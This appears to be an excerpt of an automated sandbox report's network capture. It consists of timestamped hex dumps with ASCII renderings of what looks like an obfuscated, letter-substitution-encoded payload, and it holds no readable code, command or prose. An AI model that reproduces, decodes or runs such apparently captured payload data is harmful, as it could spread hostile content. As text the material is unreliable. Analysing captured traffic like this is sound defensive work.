                                                                                                Data Ascii: gM MO n MS TTM pP UP nS TSP M Mg n TP TTM On pU Ug pU gM TTi TU U i TSO TST TSM TTM TSU TTi PS U i On pU pi OP PU MT TTn pg MT pp OM Ug UP iO TTi Pi M gS UT UT nS Pi P n Tp Mi MT TSg pn Un pU g MO n p Pn nS UP OP Pi Mi MO MM TM MU TMn UT UT Oi pT MU Tp T
                                                                                                2021-10-26 15:34:19 UTC368INData Raw: 4d 20 4d 69 54 20 54 54 4d 20 54 53 53 20 4d 67 70 20 55 54 20 67 50 20 54 54 4d 20 67 4d 20 70 20 70 50 20 4f 4f 20 4d 69 50 20 4d 69 53 20 54 54 69 20 67 50 20 54 6e 6e 20 54 4f 20 67 4f 20 4d 53 20 54 54 70 20 54 54 6e 20 54 53 55 20 54 4d 70 20 67 50 20 54 6e 6e 20 50 4f 20 70 67 20 55 67 20 54 54 55 20 54 4d 67 20 54 4d 6e 20 4d 69 54 20 69 67 20 50 70 20 69 6e 20 50 70 20 55 4d 20 54 54 69 20 54 54 4f 20 54 54 4d 20 54 4d 70 20 70 53 20 70 4d 20 69 67 20 69 4f 20 4f 50 20 54 54 4d 20 54 53 69 20 54 53 69 20 4f 6e 20 54 6e 4f 20 54 6e 20 69 6e 20 50 54 20 6e 53 20 4d 69 67 20 50 4d 20 54 4d 6e 20 4d 69 54 20 70 6e 20 50 70 20 69 6e 20 69 4d 20 6e 67 20 54 54 53 20 54 53 69 20 54 53 69 20 54 53 4f 20 69 70 20 50 67 20 50 53 20 50 69 20 6e 53 20 4d 69
                                                                                                Data Ascii: M MiT TTM TSS Mgp UT gP TTM gM p pP OO MiP MiS TTi gP Tnn TO gO MS TTp TTn TSU TMp gP Tnn PO pg Ug TTU TMg TMn MiT ig Pp in Pp UM TTi TTO TTM TMp pS pM ig iO OP TTM TSi TSi On TnO Tn in PT nS Mig PM TMn MiT pn Pp in iM ng TTS TSi TSi TSO ip Pg PS Pi nS Mi
                                                                                                2021-10-26 15:34:19 UTC384INData Raw: 69 20 67 4f 20 4d 67 67 20 54 55 20 54 55 4d 20 54 4d 53 20 4d 69 67 20 4f 55 20 54 4f 4f 20 54 54 4d 20 54 70 54 20 54 54 54 20 4d 4d 6e 20 54 55 50 20 4d 69 4d 20 67 6e 20 54 67 50 20 4d 69 67 20 50 54 20 54 54 54 20 4d 67 53 20 54 50 55 20 55 54 20 4d 53 6e 20 53 20 54 50 69 20 54 69 54 20 54 4d 4d 20 6e 54 20 4d 69 70 20 54 50 55 20 54 54 6e 20 4d 69 70 20 4d 67 50 20 4d 54 50 20 54 70 20 55 70 20 6e 4f 20 4d 69 55 20 4d 67 69 20 54 50 20 4d 50 54 20 53 20 4d 54 50 20 55 70 20 54 50 53 20 54 6e 70 20 4d 50 69 20 70 53 20 4d 53 50 20 54 55 54 20 54 53 70 20 67 50 20 55 50 20 54 6e 20 4d 4d 6e 20 4f 69 20 4d 50 20 4d 4f 20 54 55 50 20 54 53 54 20 6e 53 20 54 69 54 20 4d 54 4f 20 4d 69 4f 20 69 4f 20 54 69 50 20 67 4d 20 54 4d 4d 20 54 53 53 20 4d 67 4d
                                                                                                Data Ascii: i gO Mgg TU TUM TMS Mig OU TOO TTM TpT TTT MMn TUP MiM gn TgP Mig PT TTT MgS TPU UT MSn S TPi TiT TMM nT Mip TPU TTn Mip MgP MTP Tp Up nO MiU Mgi TP MPT S MTP Up TPS Tnp MPi pS MSP TUT TSp gP UP Tn MMn Oi MP MO TUP TST nS TiT MTO MiO iO TiP gM TMM TSS MgM
                                                                                                2021-10-26 15:34:19 UTC400INData Raw: 54 6e 20 4d 69 54 20 54 67 69 20 4f 50 20 6e 70 20 55 50 20 4d 54 55 20 54 6e 55 20 54 53 67 20 4d 53 4f 20 70 70 20 4d 4d 6e 20 4f 54 20 67 55 20 4d 67 70 20 54 4d 70 20 4f 20 54 69 70 20 6e 70 20 4d 54 4f 20 54 50 6e 20 69 54 20 69 4d 20 67 53 20 54 4f 20 54 4d 67 20 54 69 53 20 54 53 67 20 4d 53 20 54 50 55 20 67 69 20 4d 4d 6e 20 54 4d 67 20 4d 50 50 20 4d 54 50 20 54 55 6e 20 54 54 70 20 4f 54 20 54 54 53 20 54 50 67 20 4d 55 20 55 4f 20 54 54 70 20 4d 67 53 20 54 53 53 20 6e 54 20 54 69 20 54 4d 70 20 54 55 53 20 53 20 54 4d 53 20 69 53 20 4d 50 69 20 50 50 20 54 6e 69 20 4d 53 70 20 54 4f 50 20 50 67 20 54 6e 4d 20 54 69 6e 20 4d 50 20 55 55 20 54 54 4d 20 50 53 20 54 4f 70 20 55 20 54 4d 54 20 54 53 6e 20 4d 53 4d 20 4d 67 4f 20 4d 54 70 20 4d 55
                                                                                                Data Ascii: Tn MiT Tgi OP np UP MTU TnU TSg MSO pp MMn OT gU Mgp TMp O Tip np MTO TPn iT iM gS TO TMg TiS TSg MS TPU gi MMn TMg MPP MTP TUn TTp OT TTS TPg MU UO TTp MgS TSS nT Ti TMp TUS S TMS iS MPi PP Tni MSp TOP Pg TnM Tin MP UU TTM PS TOp U TMT TSn MSM MgO MTp MU
                                                                                                2021-10-26 15:34:19 UTC416INData Raw: 54 53 20 6e 54 20 4d 54 67 20 54 50 55 20 6e 70 20 4d 69 4d 20 4d 54 53 20 54 53 69 20 54 4f 4d 20 4d 67 53 20 50 54 20 4d 4d 67 20 54 4f 20 70 69 20 53 20 54 70 50 20 4d 50 20 54 55 55 20 54 67 4d 20 67 70 20 4d 67 50 20 6e 53 20 54 4f 20 54 53 20 6e 70 20 4d 53 6e 20 4d 69 69 20 54 55 50 20 69 70 20 54 67 20 54 6e 69 20 6e 20 54 53 69 20 4d 54 50 20 70 4f 20 4d 53 4f 20 54 53 70 20 4f 6e 20 4d 54 55 20 70 69 20 67 54 20 54 53 70 20 67 4d 20 4d 69 4d 20 54 55 20 54 54 20 54 69 55 20 54 70 67 20 69 69 20 4d 53 4f 20 54 67 69 20 69 55 20 55 53 20 4d 54 4f 20 4d 70 20 4d 54 4f 20 54 55 4f 20 54 55 6e 20 54 50 4f 20 54 53 69 20 4d 69 67 20 54 69 69 20 70 53 20 69 20 54 6e 20 4d 67 55 20 4d 20 54 50 54 20 54 4d 4d 20 54 70 4d 20 69 67 20 4f 55 20 50 54 20 54
                                                                                                Data Ascii: TS nT MTg TPU np MiM MTS TSi TOM MgS PT MMg TO pi S TpP MP TUU TgM gp MgP nS TO TS np MSn Mii TUP ip Tg Tni n TSi MTP pO MSO TSp On MTU pi gT TSp gM MiM TU TT TiU Tpg ii MSO Tgi iU US MTO Mp MTO TUO TUn TPO TSi Mig Tii pS i Tn MgU M TPT TMM TpM ig OU PT T
                                                                                                2021-10-26 15:34:19 UTC432INData Raw: 20 54 67 70 20 50 4f 20 67 67 20 69 4d 20 54 50 4d 20 4d 54 50 20 4f 4f 20 4d 53 53 20 4d 53 70 20 54 53 4f 20 6e 50 20 50 53 20 4d 69 69 20 4d 67 20 54 4f 4d 20 54 6e 69 20 54 4f 70 20 4d 4d 4d 20 54 54 50 20 54 69 50 20 54 70 70 20 54 4d 6e 20 4d 53 50 20 54 4d 69 20 54 67 6e 20 54 4d 54 20 4d 69 6e 20 69 55 20 54 4f 53 20 4d 53 20 54 6e 54 20 54 4f 20 4d 53 53 20 54 4d 50 20 54 4d 55 20 4d 50 4d 20 54 70 20 54 53 70 20 67 54 20 54 55 50 20 54 67 20 67 50 20 4d 54 69 20 4d 53 70 20 4d 70 20 54 55 53 20 70 69 20 4d 69 50 20 54 6e 4f 20 4d 54 20 54 70 67 20 53 20 54 4d 54 20 4d 53 67 20 54 4d 67 20 67 67 20 70 55 20 50 55 20 69 6e 20 4d 69 50 20 55 55 20 4d 67 50 20 55 4d 20 54 4f 20 54 55 55 20 54 4d 20 4d 54 54 20 54 55 4f 20 70 53 20 54 4d 70 20 54 50
                                                                                                Data Ascii: Tgp PO gg iM TPM MTP OO MSS MSp TSO nP PS Mii Mg TOM Tni TOp MMM TTP TiP Tpp TMn MSP TMi Tgn TMT Min iU TOS MS TnT TO MSS TMP TMU MPM Tp TSp gT TUP Tg gP MTi MSp Mp TUS pi MiP TnO MT Tpg S TMT MSg TMg gg pU PU in MiP UU MgP UM TO TUU TM MTT TUO pS TMp TP
                                                                                                2021-10-26 15:34:19 UTC448INData Raw: 53 20 54 70 6e 20 4d 54 67 20 67 6e 20 4f 4d 20 70 55 20 54 4f 20 54 55 69 20 54 4d 50 20 54 67 50 20 54 54 6e 20 54 67 55 20 54 50 67 20 4d 67 20 55 54 20 4d 50 67 20 4d 4d 4f 20 4d 53 6e 20 4d 4d 69 20 69 4f 20 4d 4d 67 20 70 6e 20 4d 67 20 55 70 20 69 53 20 50 4f 20 54 69 69 20 54 4d 20 54 6e 53 20 67 69 20 53 20 54 53 69 20 4d 50 20 55 4d 20 4d 53 54 20 4d 50 69 20 54 69 67 20 54 53 53 20 67 70 20 54 69 67 20 54 70 53 20 54 6e 50 20 54 67 53 20 4d 4d 53 20 54 53 4d 20 54 6e 53 20 70 4d 20 54 6e 55 20 70 6e 20 54 6e 70 20 4d 67 4d 20 54 53 54 20 4d 4f 20 4d 54 50 20 54 53 69 20 4d 67 6e 20 54 55 50 20 4f 4f 20 4d 50 4d 20 69 55 20 69 53 20 54 54 4f 20 4d 69 4d 20 4d 50 20 55 54 20 54 55 54 20 54 55 69 20 54 53 4d 20 4d 67 67 20 54 67 53 20 4d 67 54 20
                                                                                                Data Ascii: S Tpn MTg gn OM pU TO TUi TMP TgP TTn TgU TPg Mg UT MPg MMO MSn MMi iO MMg pn Mg Up iS PO Tii TM TnS gi S TSi MP UM MST MPi Tig TSS gp Tig TpS TnP TgS MMS TSM TnS pM TnU pn Tnp MgM TST MO MTP TSi Mgn TUP OO MPM iU iS TTO MiM MP UT TUT TUi TSM Mgg TgS MgT
                                                                                                2021-10-26 15:34:19 UTC464INData Raw: 20 54 54 69 20 55 50 20 54 67 69 20 54 54 50 20 4f 4f 20 4d 20 70 4f 20 4d 4d 55 20 54 4f 50 20 69 69 20 54 53 4f 20 4d 69 70 20 54 53 4f 20 54 20 54 6e 54 20 4d 53 67 20 54 55 70 20 6e 67 20 4d 54 70 20 54 69 53 20 4d 53 54 20 4d 67 53 20 50 67 20 70 6e 20 69 20 6e 53 20 55 69 20 69 67 20 69 6e 20 4f 54 20 54 4d 20 54 54 70 20 54 50 50 20 54 53 55 20 70 54 20 4d 50 4d 20 54 53 55 20 4d 53 4f 20 54 67 67 20 54 70 4f 20 54 69 69 20 54 4f 4d 20 70 4d 20 54 54 54 20 54 53 53 20 4d 54 50 20 54 70 69 20 54 55 53 20 67 54 20 4d 69 67 20 4f 50 20 54 53 55 20 4d 70 20 6e 55 20 70 4f 20 54 53 6e 20 6e 67 20 70 69 20 50 20 50 50 20 54 54 67 20 54 4d 70 20 6e 6e 20 54 6e 69 20 54 54 70 20 4d 69 54 20 54 69 4d 20 54 70 50 20 54 55 54 20 50 54 20 4d 4d 50 20 6e 69 20
                                                                                                Data Ascii: TTi UP Tgi TTP OO M pO MMU TOP ii TSO Mip TSO T TnT MSg TUp ng MTp TiS MST MgS Pg pn i nS Ui ig in OT TM TTp TPP TSU pT MPM TSU MSO Tgg TpO Tii TOM pM TTT TSS MTP Tpi TUS gT Mig OP TSU Mp nU pO TSn ng pi P PP TTg TMp nn Tni TTp MiT TiM TpP TUT PT MMP ni
                                                                                                2021-10-26 15:34:19 UTC480INData Raw: 20 54 69 4f 20 54 54 69 20 4d 4d 53 20 4d 4d 50 20 54 69 55 20 54 69 55 20 50 69 20 54 69 70 20 4f 50 20 54 69 67 20 70 20 4d 69 69 20 54 6e 50 20 69 69 20 50 54 20 54 53 53 20 4d 69 53 20 55 53 20 4d 69 53 20 54 54 67 20 4d 53 55 20 6e 20 54 55 67 20 4d 53 55 20 54 55 54 20 54 69 50 20 50 70 20 4d 67 20 55 4d 20 4d 53 6e 20 4d 69 70 20 4d 50 53 20 54 53 6e 20 54 69 6e 20 70 67 20 54 69 53 20 4d 69 4f 20 54 6e 54 20 50 53 20 54 69 67 20 54 4d 70 20 67 4d 20 4d 20 54 50 20 4f 70 20 4d 67 70 20 50 54 20 54 4f 70 20 54 69 53 20 50 70 20 4f 4f 20 54 53 4f 20 54 67 20 67 69 20 4d 4d 20 69 50 20 50 70 20 4f 55 20 55 53 20 4d 53 4f 20 54 55 20 50 4f 20 55 50 20 54 6e 55 20 67 4d 20 54 54 4f 20 54 4d 4f 20 54 70 67 20 4d 50 54 20 50 4d 20 54 53 69 20 4d 4d 67 20
                                                                                                Data Ascii: TiO TTi MMS MMP TiU TiU Pi Tip OP Tig p Mii TnP ii PT TSS MiS US MiS TTg MSU n TUg MSU TUT TiP Pp Mg UM MSn Mip MPS TSn Tin pg TiS MiO TnT PS Tig TMp gM M TP Op Mgp PT TOp TiS Pp OO TSO Tg gi MM iP Pp OU US MSO TU PO UP TnU gM TTO TMO Tpg MPT PM TSi MMg
                                                                                                2021-10-26 15:34:19 UTC496INData Raw: 50 20 54 67 70 20 4d 69 20 54 6e 55 20 54 67 4d 20 54 70 53 20 54 69 6e 20 54 53 4d 20 4d 54 67 20 54 53 4f 20 70 70 20 54 67 69 20 67 69 20 4d 53 67 20 54 4f 69 20 4d 50 69 20 54 6e 53 20 54 55 67 20 54 55 53 20 54 70 50 20 4d 69 6e 20 4d 67 55 20 4d 50 20 6e 4d 20 6e 4f 20 67 67 20 54 69 20 4d 67 4d 20 67 55 20 54 50 67 20 50 54 20 6e 20 4d 54 54 20 4d 69 50 20 4d 53 70 20 4d 67 70 20 54 4f 70 20 4d 4d 6e 20 4d 4d 54 20 54 55 4d 20 67 54 20 70 53 20 6e 70 20 55 69 20 67 70 20 4d 70 20 67 20 4d 54 70 20 54 4f 70 20 54 50 4d 20 54 67 55 20 4d 53 4d 20 54 4d 4d 20 54 53 20 67 54 20 4d 6e 20 54 69 69 20 54 54 55 20 4d 55 20 54 69 53 20 4d 4d 69 20 4d 54 4f 20 67 4d 20 4d 69 20 4f 70 20 55 4f 20 54 4d 54 20 54 4f 53 20 54 6e 54 20 54 55 4d 20 54 54 54 20 4d
                                                                                                Data Ascii: P Tgp Mi TnU TgM TpS Tin TSM MTg TSO pp Tgi gi MSg TOi MPi TnS TUg TUS TpP Min MgU MP nM nO gg Ti MgM gU TPg PT n MTT MiP MSp Mgp TOp MMn MMT TUM gT pS np Ui gp Mp g MTp TOp TPM TgU MSM TMM TS gT Mn Tii TTU MU TiS MMi MTO gM Mi Op UO TMT TOS TnT TUM TTT M
                                                                                                2021-10-26 15:34:19 UTC512INData Raw: 50 4f 20 4f 53 20 4f 20 4d 54 6e 20 54 4f 69 20 69 4f 20 67 54 20 54 4f 20 4d 69 54 20 4d 69 69 20 54 55 6e 20 54 4d 4d 20 54 4f 50 20 4d 69 4f 20 54 69 20 55 4f 20 54 6e 6e 20 4d 54 6e 20 6e 69 20 70 53 20 6e 67 20 4d 69 4f 20 54 67 54 20 4d 53 4f 20 54 69 70 20 4f 70 20 54 6e 53 20 4d 69 50 20 54 50 50 20 54 4d 55 20 4d 53 67 20 4d 53 67 20 54 67 50 20 4d 69 20 55 6e 20 67 70 20 54 50 67 20 54 6e 54 20 6e 20 70 55 20 55 55 20 54 4d 53 20 4d 53 20 4d 69 69 20 4f 67 20 54 70 55 20 4d 54 69 20 54 54 50 20 54 55 70 20 4d 69 4f 20 70 70 20 4d 53 4f 20 54 70 20 54 53 53 20 55 53 20 54 4d 4d 20 54 54 54 20 4d 53 55 20 54 67 67 20 4d 53 69 20 54 50 55 20 54 4f 50 20 67 4f 20 54 50 4f 20 4d 67 4f 20 4d 4d 53 20 4d 67 4f 20 54 55 70 20 54 4f 55 20 4d 69 6e 20 4d
                                                                                                Data Ascii: PO OS O MTn TOi iO gT TO MiT Mii TUn TMM TOP MiO Ti UO Tnn MTn ni pS ng MiO TgT MSO Tip Op TnS MiP TPP TMU MSg MSg TgP Mi Un gp TPg TnT n pU UU TMS MS Mii Og TpU MTi TTP TUp MiO pp MSO Tp TSS US TMM TTT MSU Tgg MSi TPU TOP gO TPO MgO MMS MgO TUp TOU Min M
                                                                                                2021-10-26 15:34:19 UTC528INData Raw: 4f 20 54 55 4f 20 54 50 55 20 54 54 55 20 67 69 20 54 55 4f 20 54 67 54 20 4d 4d 4d 20 4d 4d 70 20 54 55 55 20 54 50 6e 20 6e 50 20 69 6e 20 54 4d 55 20 55 4f 20 4d 69 55 20 6e 69 20 4d 67 54 20 4d 53 54 20 4d 54 54 20 54 54 50 20 4d 69 67 20 54 50 20 54 6e 53 20 54 50 4f 20 50 54 20 54 4d 50 20 4d 67 55 20 4d 4d 54 20 67 20 4f 55 20 4d 67 54 20 4d 69 67 20 54 67 55 20 54 69 4f 20 54 55 69 20 70 67 20 50 70 20 50 55 20 4f 55 20 69 53 20 67 67 20 54 4f 70 20 54 50 54 20 55 50 20 67 54 20 54 69 69 20 54 4f 70 20 54 67 4f 20 54 67 67 20 54 53 4f 20 54 53 55 20 54 6e 53 20 4d 67 53 20 54 6e 20 54 70 20 4f 53 20 6e 67 20 54 4d 50 20 69 4d 20 54 4f 69 20 55 6e 20 54 55 67 20 54 4f 54 20 54 69 54 20 54 6e 50 20 55 69 20 54 54 69 20 54 53 70 20 55 54 20 54 50 4d
                                                                                                Data Ascii: O TUO TPU TTU gi TUO TgT MMM MMp TUU TPn nP in TMU UO MiU ni MgT MST MTT TTP Mig TP TnS TPO PT TMP MgU MMT g OU MgT Mig TgU TiO TUi pg Pp PU OU iS gg TOp TPT UP gT Tii TOp TgO Tgg TSO TSU TnS MgS Tn Tp OS ng TMP iM TOi Un TUg TOT TiT TnP Ui TTi TSp UT TPM
                                                                                                2021-10-26 15:34:19 UTC544INData Raw: 54 4d 70 20 50 53 20 4d 70 20 4d 67 67 20 55 6e 20 54 67 20 54 69 67 20 4d 69 54 20 54 69 67 20 54 53 4f 20 4d 50 54 20 54 4f 53 20 54 4d 20 54 69 20 50 54 20 4d 4d 67 20 54 54 4d 20 54 69 6e 20 4d 4d 4f 20 54 54 70 20 4d 53 55 20 69 70 20 4d 69 55 20 54 67 67 20 4f 55 20 54 54 70 20 6e 50 20 54 4f 70 20 54 50 53 20 4f 20 4d 54 53 20 4d 53 6e 20 54 67 70 20 70 50 20 4d 50 69 20 54 50 67 20 4d 50 53 20 55 50 20 54 53 6e 20 54 4f 53 20 67 69 20 54 50 50 20 54 50 4f 20 4d 4f 20 4f 67 20 54 67 4f 20 54 55 69 20 54 4f 4d 20 55 55 20 54 69 55 20 4d 54 70 20 54 70 4d 20 4d 4d 53 20 6e 69 20 54 55 20 6e 20 4d 55 20 4f 4d 20 69 53 20 54 50 53 20 4d 53 4f 20 54 54 6e 20 70 50 20 54 70 54 20 4d 4f 20 4d 4f 20 54 54 50 20 55 53 20 54 70 54 20 54 54 67 20 69 50 20 4d
                                                                                                Data Ascii: TMp PS Mp Mgg Un Tg Tig MiT Tig TSO MPT TOS TM Ti PT MMg TTM Tin MMO TTp MSU ip MiU Tgg OU TTp nP TOp TPS O MTS MSn Tgp pP MPi TPg MPS UP TSn TOS gi TPP TPO MO Og TgO TUi TOM UU TiU MTp TpM MMS ni TU n MU OM iS TPS MSO TTn pP TpT MO MO TTP US TpT TTg iP M
                                                                                                2021-10-26 15:34:19 UTC560INData Raw: 20 4d 70 20 4d 54 70 20 4d 4d 4f 20 54 6e 67 20 69 4f 20 70 53 20 54 4f 50 20 4f 53 20 55 54 20 55 20 67 69 20 4d 4f 20 54 50 54 20 54 67 50 20 4d 67 4f 20 4d 67 54 20 70 4f 20 54 67 69 20 4d 4f 20 4d 20 4d 67 50 20 4d 53 4f 20 50 4d 20 54 6e 53 20 55 69 20 54 4f 55 20 54 54 70 20 55 69 20 4f 67 20 4d 67 54 20 50 53 20 54 6e 70 20 50 70 20 54 50 54 20 50 6e 20 54 50 69 20 54 53 67 20 54 69 70 20 54 4d 53 20 4d 4d 6e 20 4d 67 69 20 54 50 55 20 54 54 4f 20 54 50 67 20 54 69 4d 20 4d 53 50 20 53 20 54 4f 70 20 54 55 4f 20 54 70 70 20 4d 53 6e 20 4d 4d 4d 20 4d 67 55 20 54 6e 4d 20 54 6e 20 54 53 55 20 54 4f 50 20 50 67 20 54 6e 69 20 54 67 53 20 4d 67 50 20 54 4d 4f 20 4f 70 20 54 53 4f 20 70 53 20 4d 53 55 20 4f 69 20 69 70 20 54 54 53 20 54 54 50 20 54 54
                                                                                                Data Ascii: Mp MTp MMO Tng iO pS TOP OS UT U gi MO TPT TgP MgO MgT pO Tgi MO M MgP MSO PM TnS Ui TOU TTp Ui Og MgT PS Tnp Pp TPT Pn TPi TSg Tip TMS MMn Mgi TPU TTO TPg TiM MSP S TOp TUO Tpp MSn MMM MgU TnM Tn TSU TOP Pg Tni TgS MgP TMO Op TSO pS MSU Oi ip TTS TTP TT
                                                                                                2021-10-26 15:34:19 UTC576INData Raw: 20 4d 69 6e 20 54 70 53 20 54 54 4f 20 6e 54 20 6e 69 20 67 6e 20 4d 4d 69 20 67 50 20 54 55 4f 20 54 67 69 20 54 4d 53 20 69 54 20 4d 53 20 6e 67 20 50 67 20 70 50 20 54 4d 53 20 70 50 20 54 53 55 20 4f 53 20 54 70 50 20 54 50 4d 20 54 54 67 20 54 4f 50 20 50 4f 20 4d 20 54 69 4f 20 54 55 54 20 54 53 70 20 54 6e 67 20 4d 53 70 20 4d 67 55 20 4d 50 67 20 54 67 53 20 4d 54 69 20 4d 69 54 20 4d 4d 4d 20 4d 54 20 55 70 20 54 67 54 20 4d 53 55 20 54 70 53 20 54 6e 20 67 55 20 4f 70 20 55 53 20 54 55 53 20 55 67 20 54 67 70 20 54 4d 6e 20 4d 54 4d 20 4d 50 20 69 4f 20 54 6e 67 20 4d 53 4f 20 4d 67 55 20 54 69 6e 20 50 50 20 4d 50 69 20 54 20 54 69 50 20 4d 67 69 20 54 6e 53 20 54 6e 54 20 54 67 70 20 4f 67 20 4d 50 20 4d 4d 20 4d 54 67 20 70 50 20 54 6e 70 20
                                                                                                Data Ascii: Min TpS TTO nT ni gn MMi gP TUO Tgi TMS iT MS ng Pg pP TMS pP TSU OS TpP TPM TTg TOP PO M TiO TUT TSp Tng MSp MgU MPg TgS MTi MiT MMM MT Up TgT MSU TpS Tn gU Op US TUS Ug Tgp TMn MTM MP iO Tng MSO MgU Tin PP MPi T TiP Mgi TnS TnT Tgp Og MP MM MTg pP Tnp
                                                                                                2021-10-26 15:34:19 UTC592INData Raw: 55 70 20 54 50 53 20 54 54 4f 20 50 4f 20 4d 70 20 54 6e 53 20 55 4f 20 54 50 4f 20 54 53 54 20 54 6e 55 20 4d 53 70 20 54 50 50 20 54 4d 4f 20 70 4f 20 4d 54 6e 20 54 55 4f 20 4d 4d 67 20 4d 4d 55 20 54 53 55 20 54 55 54 20 67 70 20 4d 4f 20 4d 70 20 54 55 50 20 54 67 67 20 54 54 4f 20 54 70 20 4d 67 70 20 54 55 55 20 54 67 53 20 54 54 20 4d 69 50 20 54 4d 20 4d 50 4d 20 54 4f 4d 20 54 50 70 20 4d 67 4f 20 4d 54 50 20 69 70 20 54 4f 69 20 54 67 50 20 6e 4f 20 4f 55 20 54 50 50 20 4d 53 50 20 69 69 20 54 50 53 20 54 4d 4d 20 54 69 50 20 54 67 67 20 54 6e 54 20 54 4d 6e 20 54 67 4f 20 4d 69 55 20 54 70 69 20 4d 4d 20 4d 67 53 20 50 50 20 4d 53 4f 20 6e 67 20 55 50 20 54 69 53 20 54 4f 55 20 54 67 6e 20 69 50 20 54 50 20 54 50 69 20 4d 55 20 4d 67 69 20 4d
                                                                                                Data Ascii: Up TPS TTO PO Mp TnS UO TPO TST TnU MSp TPP TMO pO MTn TUO MMg MMU TSU TUT gp MO Mp TUP Tgg TTO Tp Mgp TUU TgS TT MiP TM MPM TOM TPp MgO MTP ip TOi TgP nO OU TPP MSP ii TPS TMM TiP Tgg TnT TMn TgO MiU Tpi MM MgS PP MSO ng UP TiS TOU Tgn iP TP TPi MU Mgi M
                                                                                                2021-10-26 15:34:19 UTC608INData Raw: 55 20 4d 4d 4d 20 67 20 54 4d 50 20 67 4f 20 54 50 4f 20 50 69 20 55 55 20 54 20 54 70 53 20 54 54 69 20 4d 69 4d 20 4d 54 70 20 54 53 6e 20 4d 4d 4f 20 53 20 4d 69 67 20 4d 54 70 20 6e 70 20 54 4f 4d 20 4f 70 20 54 67 4d 20 54 4f 20 54 53 67 20 54 6e 53 20 6e 4d 20 4d 69 6e 20 54 55 20 54 4f 53 20 4d 4d 55 20 4d 53 20 54 55 50 20 4f 67 20 70 4d 20 4d 67 4f 20 4d 50 67 20 67 67 20 53 20 70 55 20 4d 69 53 20 4f 4d 20 54 53 69 20 69 4f 20 6e 69 20 54 6e 4f 20 54 69 50 20 50 70 20 54 6e 20 4d 67 67 20 67 53 20 67 70 20 54 70 54 20 4f 54 20 4d 69 69 20 55 20 69 20 50 55 20 54 70 54 20 4d 69 4f 20 4d 67 6e 20 4d 4d 70 20 54 54 55 20 54 4d 55 20 54 67 70 20 6e 4f 20 50 50 20 4d 54 20 69 50 20 54 70 67 20 54 54 55 20 4d 69 53 20 54 4f 50 20 4d 67 55 20 54 54 55
                                                                                                Data Ascii: U MMM g TMP gO TPO Pi UU T TpS TTi MiM MTp TSn MMO S Mig MTp np TOM Op TgM TO TSg TnS nM Min TU TOS MMU MS TUP Og pM MgO MPg gg S pU MiS OM TSi iO ni TnO TiP Pp Tn Mgg gS gp TpT OT Mii U i PU TpT MiO Mgn MMp TTU TMU Tgp nO PP MT iP Tpg TTU MiS TOP MgU TTU
                                                                                                2021-10-26 15:34:19 UTC624INData Raw: 20 69 20 4d 53 55 20 4d 54 67 20 4d 69 20 54 6e 67 20 54 55 67 20 4d 69 20 4d 54 50 20 4d 67 4d 20 4d 67 4f 20 54 54 4d 20 54 54 50 20 54 6e 54 20 54 70 20 4d 54 53 20 4d 4d 4d 20 4d 53 20 4d 54 70 20 4d 54 53 20 54 4f 67 20 55 55 20 4d 4f 20 4d 54 54 20 55 20 54 53 6e 20 54 54 4f 20 55 4d 20 4d 50 67 20 4d 54 53 20 4d 67 4d 20 6e 6e 20 54 55 69 20 4d 54 4f 20 54 54 67 20 4f 50 20 54 70 70 20 54 4d 50 20 4d 54 55 20 54 69 53 20 50 20 50 50 20 54 6e 50 20 67 70 20 54 4f 53 20 4d 4d 70 20 55 67 20 4d 53 53 20 50 67 20 4d 4d 50 20 4d 54 50 20 4d 4d 70 20 4d 67 54 20 54 67 67 20 4d 69 6e 20 4d 67 55 20 4d 53 20 50 70 20 4d 53 54 20 54 54 50 20 50 55 20 54 4d 50 20 54 4d 4f 20 69 54 20 54 6e 20 54 67 55 20 54 67 53 20 54 67 4d 20 54 6e 55 20 4d 67 69 20 67 4f
                                                                                                Data Ascii: i MSU MTg Mi Tng TUg Mi MTP MgM MgO TTM TTP TnT Tp MTS MMM MS MTp MTS TOg UU MO MTT U TSn TTO UM MPg MTS MgM nn TUi MTO TTg OP Tpp TMP MTU TiS P PP TnP gp TOS MMp Ug MSS Pg MMP MTP MMp MgT Tgg Min MgU MS Pp MST TTP PU TMP TMO iT Tn TgU TgS TgM TnU Mgi gO
                                                                                                2021-10-26 15:34:19 UTC640INData Raw: 4f 20 4d 54 6e 20 55 53 20 4d 54 50 20 70 4d 20 54 54 69 20 4d 53 54 20 4d 54 6e 20 4d 53 67 20 4d 53 55 20 4d 50 54 20 4f 53 20 54 69 4d 20 54 70 67 20 50 4d 20 4d 53 4f 20 54 69 67 20 54 50 67 20 70 4d 20 4d 69 4d 20 4d 54 69 20 54 4d 67 20 54 20 54 54 4d 20 54 4d 50 20 50 6e 20 54 6e 67 20 54 6e 67 20 69 50 20 70 67 20 54 50 69 20 54 50 53 20 54 53 4d 20 4f 67 20 54 70 20 50 70 20 54 55 50 20 69 6e 20 54 50 70 20 54 53 20 70 54 20 54 4d 6e 20 6e 70 20 54 6e 20 55 4f 20 4d 69 53 20 4d 67 69 20 54 70 54 20 50 70 20 67 20 4d 53 53 20 54 4d 20 54 4f 4d 20 54 67 4f 20 67 4f 20 4d 4d 70 20 53 20 70 20 4d 54 70 20 54 53 50 20 54 4f 67 20 54 50 53 20 50 54 20 54 54 20 70 50 20 54 67 53 20 50 69 20 4f 67 20 54 70 4f 20 4d 4d 67 20 4d 53 67 20 6e 53 20 4d 50 67
                                                                                                Data Ascii: O MTn US MTP pM TTi MST MTn MSg MSU MPT OS TiM Tpg PM MSO Tig TPg pM MiM MTi TMg T TTM TMP Pn Tng Tng iP pg TPi TPS TSM Og Tp Pp TUP in TPp TS pT TMn np Tn UO MiS Mgi TpT Pp g MSS TM TOM TgO gO MMp S p MTp TSP TOg TPS PT TT pP TgS Pi Og TpO MMg MSg nS MPg
